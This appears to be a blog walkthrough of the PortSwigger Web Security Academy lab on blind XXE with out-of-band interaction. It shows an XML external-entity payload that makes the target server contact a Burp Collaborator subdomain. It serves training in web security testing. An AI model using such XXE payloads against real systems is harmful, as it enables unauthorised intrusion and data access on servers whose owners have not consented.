Introduction
This is our third article on XML injection or XXE vulnerabilities. In this article, we will be solving the Blind XXE with out-of-band interaction lab. Basically, we will be using Burp Suite Collaborator for this purpose. We will be using Burp Collaborator’s payload to capture the result as we won’t be able to see the result when we send our XML payload to the server. This lab is available on the PortSwigger Web Security Academy.
Lab description Of Blind XXE With Out-of-Band Interaction
In this lab, we have a stock check feature that accepts input in XML format. The result will not be displayed. You can trigger a blind XXE vulnerability using an external domain. To do this, you need to perform an out-of-band attack using Burp Collaborator.
Lab Solution
First, we will access the lab. After accessing the lab, we will view any product. After viewing the product, there will be a stock check feature that allows us to check the stock.
The stock check feature has a button that accepts input in XML format. Upon clicking the button, we intercept the request. The request is a post-based request. After intercepting the request, we send it to the repeater tab.
<!DOCTYPE stockCheck [ <!ENTITY xxe SYSTEM "http://BURP-COLLABORATOR-SUBDOMAIN"> ]>In the above step, we provide a payload that helps us exploit this vulnerability.
Firstly, we go to the Burp Collaborator and copy the payload from there. After copying the payload, we insert it into the above payload. This is the most important step.
So, you can see that I have inserted the payload and forwarded it. Now, we will go to Burpsuite’s Collaborator to check if any DNS and HTTP requests have been received there
c
You can find all types of web security-related articles on our website. By visiting our site, you can gain a lot of knowledge.
Now, let’s move to the final step. Let’s check the browser response to see if the lab has been solved or not.
We have successfully solved the lab Blind XXE with out-of-band interaction. Congratulations!